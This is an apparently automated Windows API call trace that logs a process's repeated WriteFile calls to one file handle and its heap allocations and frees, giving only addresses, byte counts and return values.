	[0102.430] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4f, lpOverlapped=0x0) returned 1
	[0102.430] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.430] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x43, lpOverlapped=0x0) returned 1
	[0102.430] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.431] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x33, lpOverlapped=0x0) returned 1
	[0102.431] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.431] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x48, lpOverlapped=0x0) returned 1
	[0102.431] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.431] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x10, lpOverlapped=0x0) returned 1
	[0102.431] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.432] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x42, lpOverlapped=0x0) returned 1
	[0102.432] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.433] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x42, lpOverlapped=0x0) returned 1
	[0102.433] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.433] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2b, lpOverlapped=0x0) returned 1
	[0102.433] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.434] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4f, lpOverlapped=0x0) returned 1
	[0102.434] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.434] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x23, lpOverlapped=0x0) returned 1
	[0102.434] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.434] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x49, lpOverlapped=0x0) returned 1
	[0102.434] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.435] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x10, lpOverlapped=0x0) returned 1
	[0102.435] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.435] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1e, lpOverlapped=0x0) returned 1
	[0102.435] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.435] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x49, lpOverlapped=0x0) returned 1
	[0102.436] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.436] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2d, lpOverlapped=0x0) returned 1
	[0102.436] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.437] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x36, lpOverlapped=0x0) returned 1
	[0102.437] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.437] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x48, lpOverlapped=0x0) returned 1
	[0102.437] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.437] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x37, lpOverlapped=0x0) returned 1
	[0102.437] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.438] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2b, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2b, lpOverlapped=0x0) returned 1
	[0102.438] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.438] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3f, lpOverlapped=0x0) returned 1
	[0102.438] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.438] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x45, lpOverlapped=0x0) returned 1
	[0102.439] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.439] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x22, lpOverlapped=0x0) returned 1
	[0102.439] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.439] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x51, lpOverlapped=0x0) returned 1
	[0102.439] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.440] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x46, lpOverlapped=0x0) returned 1
	[0102.440] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.440] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3f, lpOverlapped=0x0) returned 1
	[0102.440] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.440] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3e, lpOverlapped=0x0) returned 1
	[0102.440] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.441] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x51, lpOverlapped=0x0) returned 1
	[0102.441] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.441] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x43, lpOverlapped=0x0) returned 1
	[0102.441] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.442] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2e, lpOverlapped=0x0) returned 1
	[0102.442] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.442] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x19, lpOverlapped=0x0) returned 1
	[0102.442] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.442] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x48, lpOverlapped=0x0) returned 1
	[0102.442] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.443] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x55, lpOverlapped=0x0) returned 1
	[0102.443] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.443] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4e, lpOverlapped=0x0) returned 1
	[0102.443] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.444] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x20, lpOverlapped=0x0) returned 1
	[0102.444] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x1f1a30
	[0102.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c2d0
	[0102.444] WriteFile (in: hFile=0x258, lpBuffer=0x24c2d0*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x128b3c, lpOverlapped=0x0 | out: lpBuffer=0x24c2d0*, lpNumberOfBytesWritten=0x128b3c*=0x15, lpOverlapped=0x0) returned 1
	[0102.444] WriteFile (in: hFile=0x258, lpBuffer=0x128b2c*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128b3c, lpOverlapped=0x0 | out: lpBuffer=0x128b2c*, lpNumberOfBytesWritten=0x128b3c*=0x2, lpOverlapped=0x0) returned 1
	[0102.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x248968
	[0102.444] WriteFile (in: hFile=0x258, lpBuffer=0x248968*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0x128b08, lpOverlapped=0x0 | out: lpBuffer=0x248968*, lpNumberOfBytesWritten=0x128b08*=0x75, lpOverlapped=0x0) returned 1
	[0102.444] WriteFile (in: hFile=0x258, lpBuffer=0x128af8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128b08, lpOverlapped=0x0 | out: lpBuffer=0x128af8*, lpNumberOfBytesWritten=0x128b08*=0x2, lpOverlapped=0x0) returned 1
	[0102.444] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x16, lpOverlapped=0x0) returned 1
	[0102.444] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.445] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2c, lpOverlapped=0x0) returned 1
	[0102.445] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d0b8
	[0102.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec5e0
	[0102.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x1ec618
	[0102.445] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d0b8) returned 1
	[0102.445] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ec5e0) returned 1
	[0102.445] WriteFile (in: hFile=0x258, lpBuffer=0x1ec618*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x128a10, lpOverlapped=0x0 | out: lpBuffer=0x1ec618*, lpNumberOfBytesWritten=0x128a10*=0x26, lpOverlapped=0x0) returned 1
	[0102.445] WriteFile (in: hFile=0x258, lpBuffer=0x128a00*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128a10, lpOverlapped=0x0 | out: lpBuffer=0x128a00*, lpNumberOfBytesWritten=0x128a10*=0x2, lpOverlapped=0x0) returned 1
	[0102.445] WriteFile (in: hFile=0x258, lpBuffer=0x128914*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x128914*, lpNumberOfBytesWritten=0x128900*=0x13, lpOverlapped=0x0) returned 1
	[0102.445] WriteFile (in: hFile=0x258, lpBuffer=0x1288f0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x1288f0*, lpNumberOfBytesWritten=0x128900*=0x2, lpOverlapped=0x0) returned 1
	[0102.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x70) returned 0x1ed000
	[0102.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x130) returned 0x249188
	[0102.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xb0) returned 0x25ea60
	[0102.446] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x1ed000) returned 1
	[0102.446] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x249188) returned 1
	[0102.446] WriteFile (in: hFile=0x258, lpBuffer=0x25ea60*, nNumberOfBytesToWrite=0xa9, lpNumberOfBytesWritten=0x128a10, lpOverlapped=0x0 | out: lpBuffer=0x25ea60*, lpNumberOfBytesWritten=0x128a10*=0xa9, lpOverlapped=0x0) returned 1
	[0102.446] WriteFile (in: hFile=0x258, lpBuffer=0x128a00*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128a10, lpOverlapped=0x0 | out: lpBuffer=0x128a00*, lpNumberOfBytesWritten=0x128a10*=0x2, lpOverlapped=0x0) returned 1
	[0102.446] WriteFile (in: hFile=0x258, lpBuffer=0x128914*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x128914*, lpNumberOfBytesWritten=0x128900*=0x51, lpOverlapped=0x0) returned 1
	[0102.446] WriteFile (in: hFile=0x258, lpBuffer=0x1288f0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x1288f0*, lpNumberOfBytesWritten=0x128900*=0x2, lpOverlapped=0x0) returned 1
	[0102.446] WriteFile (in: hFile=0x258, lpBuffer=0x128914*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x128914*, lpNumberOfBytesWritten=0x128900*=0x33, lpOverlapped=0x0) returned 1
	[0102.447] WriteFile (in: hFile=0x258, lpBuffer=0x1288f0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x1288f0*, lpNumberOfBytesWritten=0x128900*=0x2, lpOverlapped=0x0) returned 1
	[0102.447] WriteFile (in: hFile=0x258, lpBuffer=0x128914*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x128914*, lpNumberOfBytesWritten=0x128900*=0x46, lpOverlapped=0x0) returned 1
	[0102.447] WriteFile (in: hFile=0x258, lpBuffer=0x1288f0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x1288f0*, lpNumberOfBytesWritten=0x128900*=0x2, lpOverlapped=0x0) returned 1
	[0102.447] WriteFile (in: hFile=0x258, lpBuffer=0x128914*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x128914*, lpNumberOfBytesWritten=0x128900*=0x43, lpOverlapped=0x0) returned 1
	[0102.447] WriteFile (in: hFile=0x258, lpBuffer=0x1288f0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x1288f0*, lpNumberOfBytesWritten=0x128900*=0x2, lpOverlapped=0x0) returned 1
	[0102.448] WriteFile (in: hFile=0x258, lpBuffer=0x128914*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x128914*, lpNumberOfBytesWritten=0x128900*=0xa, lpOverlapped=0x0) returned 1
	[0102.448] WriteFile (in: hFile=0x258, lpBuffer=0x1288f0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x1288f0*, lpNumberOfBytesWritten=0x128900*=0x2, lpOverlapped=0x0) returned 1
	[0102.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x680) returned 0x260a48
	[0102.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1380) returned 0x2610d0
	[0102.448] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x8b0) returned 0x262458
	[0102.450] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x262458) returned 1
	[0102.450] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xa70) returned 0x262458
	[0102.450] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x260a48) returned 1
	[0102.450] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2610d0) returned 1
	[0102.450] WriteFile (in: hFile=0x258, lpBuffer=0x262458*, nNumberOfBytesToWrite=0xa6c, lpNumberOfBytesWritten=0x128a10, lpOverlapped=0x0 | out: lpBuffer=0x262458*, lpNumberOfBytesWritten=0x128a10*=0xa6c, lpOverlapped=0x0) returned 1
	[0102.450] WriteFile (in: hFile=0x258, lpBuffer=0x128a00*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128a10, lpOverlapped=0x0 | out: lpBuffer=0x128a00*, lpNumberOfBytesWritten=0x128a10*=0x2, lpOverlapped=0x0) returned 1
	[0102.450] WriteFile (in: hFile=0x258, lpBuffer=0x128914*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x128914*, lpNumberOfBytesWritten=0x128900*=0x38, lpOverlapped=0x0) returned 1
	[0102.450] WriteFile (in: hFile=0x258, lpBuffer=0x1288f0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128900, lpOverlapped=0x0 | out: lpBuffer=0x1288f0*, lpNumberOfBytesWritten=0x128900*=0x2, lpOverlapped=0x0) returned 1
